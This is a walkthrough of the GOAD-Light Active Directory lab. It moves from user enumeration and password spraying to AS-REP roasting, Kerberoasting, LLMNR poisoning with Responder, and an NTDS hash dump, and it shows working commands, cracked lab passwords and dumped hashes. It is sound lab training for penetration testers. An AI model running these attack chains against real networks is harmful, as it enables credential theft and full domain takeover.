June 30, 2026

GOAD-Light Walkthrough

By Ouakidiyassine

6 min read

2 domains: sevenkingdoms.local north.sevenkingdoms.local

so kingslanding.sevenkingdoms.local(192.168.56.10) must be a DC in the first domain

the north.sevenkingdoms.local has two subdomains one of them should be the DC. looking at the nmap results: castleblack.north.sevenkingdoms.local(192.168.56.22) has no kerberos port open so we rule this one out winterfell.north.sevenkingdoms.local(192.168.56.11) has kerberos port open so this one is the DC for the second domain

we add these to our /etc/hosts file:

192.168.56.10 kingslanding.sevenkingdoms.local kingslanding 192.168.56.11 winterfell.north.sevenkingdoms.local winterfell 192.168.56.22 castleblack.north.sevenkingdoms.local castleblack

SMB signing is shown as false in caslteblack so maybe we can sniff packets going through that

First thing is we will try and enumerate users with enum4linux:

Findings: Domain Sid: S-1–5–21–1162251952–1164329401–3212866682 Users:

  • arya.stark
  • brandon.stark
  • hodor
  • jeor.mrmont
  • jon.snow
  • rickon.stark
  • samwell.tarly:Heartsbane
  • sansa.stark

we run ldap to get the full user list:

ldapsearch -LLL -x -H ldap://192.168.56.11 -b 'DC=north,DC=sevenkingdoms,DC=local' -D 'samwell.tarly@north.sevenkingdoms.local' -W

and we got the full list:

Administrator arya.stark eddard.stark catelyn.stark robb.stark sansa.stark brandon.stark rickon.stark hodor jon.snow samwell.tarly jeor.mormont sql_svc

verified using kerbrute userenum.

given that we already have samwell.tarly credentials we can query password policy with crackmapexec:

Minimum password length = 5 Account Lockout Threshold = 5 Locked Account Duration = 5min

In order to avoid account lockout we use SPRAYHOUND to find weakly configured passwords:

hodor:hodor

after inspecting shares on both winterfell and castleblack we got three files:

secret.ps1 script.ps1 arya.txt

within script.ps1 we got credentials for jeor.mormont:L0ngCl@w we test it. Correct creds within arya.txt we got possible credentials arya.stark:Needle we test it. Correct credentials.

witing secret.ps1 we got some weird encrypted data and a key:

cypher script

$domain="sevenkingdoms.local"

$EncryptionKeyBytes = New-Object Byte[] 32

[Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)

$EncryptionKeyBytes | Out-File "encryption.key"

$EncryptionKeyData = Get-Content "encryption.key"

Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted"

secret stored :

$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91 $secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="

T.L.

after deciphering we got this password: powerkingftw135 we have to look for the username associated with it

T.L at the end of the file might be a hint. we google GOT characters with names T.L:

Tyron Lanister Tywin Lanister Loras Tyrell

only 3 possible names we test them using nxc on the DC01 192.168.56.10

SMB 192.168.56.10 445 KINGSLANDING [+] sevenkingdoms.local\tywin.lannister:powerkingftw135 SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\tyron.lannister:powerkingftw135 STATUS_LOGON_FAILURE SMB 192.168.56.10 445 KINGSLANDING [-] sevenkingdoms.local\loras.tyrel:powerkingftw135 STATUS_LOGON_FAILURE

so basically we got tywin.lannister:powerkingftw135 on DC01 we leave this for a second

so on DC02 this is the updated creds list:

Administrator arya.stark:::::::::Needle eddard.stark catelyn.stark robb.stark sansa.stark brandon.stark rickon.stark hodor::::::::hodor jon.snow samwell.tarly:::::::::Heartsbane jeor.mormont::::::::::L0ngCl@w sql_svc

and on DC01:

tywin.lannister::::::powerkingftw135

now we will dive into the TGT ticketing abuse on KERBEROS

a bit of theory:

Kerberos is a ticket base authentication protocol used by Windows AD.

runs on tcp/udp port 88, authentication is handled by the key distribution center,and it runs on the DC

Authentication Flow:

  1. Client -> KDC (Key Distribution Center): Client creates a timestamp. The timestamp is encrypted using the user's AES key or NTLM hash This encrypted timestamp is sent to the KDC as an Authentication Service Request (AS-REQ) =======THIS PROVES THAT THE CLIENT KNOWS THE USER SECRET WITHOUT SENDING THE PASSWORD========

  2. KDC validates user: Decrypts the timestamp using the user's stored secret Verifies the timestamp is within + or — 5 minutes

  3. KDC -> Client(AS-REP with TGT): Once timestamp is validated, the KDC responds with a ticket granting ticket(TGT) TGT is encrypted and signed encryption uses the KRBTGT account's secret The client cannot decrypt the TGT

Requesting a Service ticket:

  1. Client -> KDC(TGS-REQ): Sends the encrypted TGT back to the KDC Requests a Service Ticket(ST) for a specific service This request is called a TGS-REQ

  2. KDC -> Client (TGS-REP): Decrypts the TGT using the KRBTGT secret Verifies the signature Issues a Service Ticket(ST) == ST: is encrypted using the target service account's secret, and returned to the client as TGS-REP

Accessing the service

  1. Client -> Service(AP-REQ): Connects to the service on the appropriate port Presents the Service Ticket This request is known as AP-REQ(Application Request)

KERBEROS Attacks:

  1. User Enumeration: The attacker sends bunch of AS-REQ requests, and base on the KDC response the attacker can determine whether the username exists or not

  2. AS-REP Roasting: Attacker encrypts part of the AS-REP message steal from user accounts in order to then crack them offline(PREREQUISITE: Kerberos pre -authentication is disabled).

  3. When Pre-auth is enabled the attacker must send the timestamp encrypted with the hash of the user's password. if the timestamp is matched with the DC record of the user's password, DC sends back the AS-REP containing the TGT that will be used for future access requests by this user, and it also contains infos hashed with the user's password.

  4. If pre-authentication is disabled, an attacker can request authentication credentials for any user and receive an AS-REP message from the DC. the attacker then may attempt to crack it offline.

tools used for this attack: crackmapexec

crackmapexec ldap 192.168.56.11 -u hodor -p "hodor" -d winterfell.north.sevenkingdoms.local — asreproasting asreproasting.txt

by doing that we got brandon stark hash that we ll attempt to crack using john and rockyou.txt wordlist

we got brandon.stark password which is : iseedeadpeople

our updated list:

Administrator arya.stark:::::::::Needle eddard.stark catelyn.stark robb.stark sansa.stark brandon.stark:iseedeadpeople rickon.stark hodor::::::::hodor jon.snow samwell.tarly:::::::::Heartsbane jeor.mormont::::::::::L0ngCl@w sql_svc

Now again a little bit of theory about KERBEROASTING:

Kerberoasting consists of requesting service tickets (TGS) from the KDC (Kerberos Distribution Center) that are associated with service accounts to retreive their hashes. Then attempt to crack them offline.

Attack pre-requisites:

  1. Credentials of a valid domain user account
  2. Service Principal Names.
  3. Service ticket for the running service.

In order to proceed we have to understand the meaning of SPNs (Service Principal Name)

SPN is a unique identifier that links a specific network service to the AD account running it, and it is required to securely map a client's connection request to the correct service account.

SPN format: ServiceClass/Host:Port/ServiceName

Let s try and find SPNs using the auth infos we already have using the impacket module 'GetUserSPNs.py'

GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile spn.hashes

This gave us which user is related to which service along side with their hashed passwords

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
 — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
HTTP/eyrie.north.sevenkingdoms.local sansa.stark CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2026–06–28 15:16:56.499955 <never>
CIFS/winterfell.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2026–06–28 15:17:21.060699 <never> constrained
HTTP/thewall.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2026–06–28 15:17:21.060699 <never> constrained
MSSQLSvc/castelblack.north.sevenkingdoms.local sql_svc 2026–06–28 15:17:36.407837 2026–06–28 15:29:24.488089
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433 sql_svc 2026–06–28 15:17:36.407837 2026–06–28 15:29:24.488089

so we can clearly see that sansa.stark has access to some kind of webserver with FQDN eyrie.north.sevenkingdoms. Let's try and crack the password for it

sansa.stark:345ertdfg jon.snow:iknownothing sql_svc:

Before diving deeper let's go back to some theory about LINK LOCAL MULTICAST NAME RESOLUTION :

It is a protocol based on the dns packet format that allows hosts within the same network to perform name resolutions for hosts.

  • Normal scenario: Host on the network requests a domain. DNS server does the resolution and returns the ip to the host. if not found the dns server simply returns a not found error

  • Attack scenario: Host on the network requests a domain. Attacker plays the role of DNS server, tells the host that it knows how to resolve and asks for the hash. host sends hash.

Tool used to execute this attack: Responder python package

sudo python3 Responder.py -I vmnet2

We got the robb.stark ntlm hash:

[SMB] NTLMv1-SSP Client : fe80::e0a8:c9c1:f102:3b7f [SMB] NTLMv1-SSP Username : NORTH\robb.stark [SMB] NTLMv1-SSP Hash : robb.stark::NORTH:71FF4CF2BD2B251A00000000000000000000000000000000:E55D1DAE62AAB333F9E9B6949C0640F362AC1370B7D08A1D:fc78272cc77119b8


we try to crack this one using hashcat while Responder is still running

Responder gave us the eddard.stark NTLM hash:

> ```
[SMB] NTLMv1-SSP Client : fe80::e0a8:c9c1:f102:3b7f
[SMB] NTLMv1-SSP Username : NORTH\eddard.stark
[SMB] NTLMv1-SSP Hash : eddard.stark::NORTH:3D3143633135183D00000000000000000000000000000000:689C5511D20339184230DD3DCCF93B518F7D14E56CE034C1:e9021f34edd41727

hashcat got us robb.stark password: sexywolfy lets verify that while hashcat is running for eddard.stark hash:

Password is correct and apparently robb.stark is a domain admin so we use crackmapexec to drop ntds db:

crackmapexec 192.168.56.11 smb -u robb.stark -p "sexywolfy" — ntds


SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
SMB 192.168.56.11 445 WINTERFELL [+] Dumping the NTDS, this could take a while so go grab a redbull…
SMB 192.168.56.11 445 WINTERFELL Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
SMB 192.168.56.11 445 WINTERFELL Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.56.11 445 WINTERFELL krbtgt:502:aad3b435b51404eeaad3b435b51404ee:e8536568c88650d1612cac6a64de60a3:::
SMB 192.168.56.11 445 WINTERFELL vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB 192.168.56.11 445 WINTERFELL arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
SMB 192.168.56.11 445 WINTERFELL eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
SMB 192.168.56.11 445 WINTERFELL catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
SMB 192.168.56.11 445 WINTERFELL robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
SMB 192.168.56.11 445 WINTERFELL sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
SMB 192.168.56.11 445 WINTERFELL brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
SMB 192.168.56.11 445 WINTERFELL rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
SMB 192.168.56.11 445 WINTERFELL hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
SMB 192.168.56.11 445 WINTERFELL jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
SMB 192.168.56.11 445 WINTERFELL samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
SMB 192.168.56.11 445 WINTERFELL jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
SMB 192.168.56.11 445 WINTERFELL sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB 192.168.56.11 445 WINTERFELL WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:214edbd524ba1484d45079f774182277:::
SMB 192.168.56.11 445 WINTERFELL CASTELBLACK$:1104:aad3b435b51404eeaad3b435b51404ee:e8d0ef29b45ace65faeb8adfbf0cff78:::
SMB 192.168.56.11 445 WINTERFELL SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:5f7674eeaee941e0e8669931618e8b89:::
SMB 192.168.56.11 445 WINTERFELL [+] Dumped 19 NTDS hashes to /home/notsirius/snap/crackmapexec/275/.cme/logs/WINTERFELL_192.168.56.11_2026–06–30_005230.ntds of which 16 were added to the database
SMB 192.168.56.11 445 WINTERFELL [*] To extract only enabled accounts from the output file, run the following command:
SMB 192.168.56.11 445 WINTERFELL [*] cat /home/notsirius/snap/crackmapexec/275/.cme/logs/WINTERFELL_192.168.56.11_2026–06–30_005230.ntds | grep -iv disabled | cut -d ':' -f1
SMB 192.168.56.11 445 WINTERFELL [*] grep -iv disabled /home/notsirius/snap/crackmapexec/275/.cme/logs/WINTERFELL_192.168.56.11_2026–06–30_005230.ntds | cut -d ':' -f1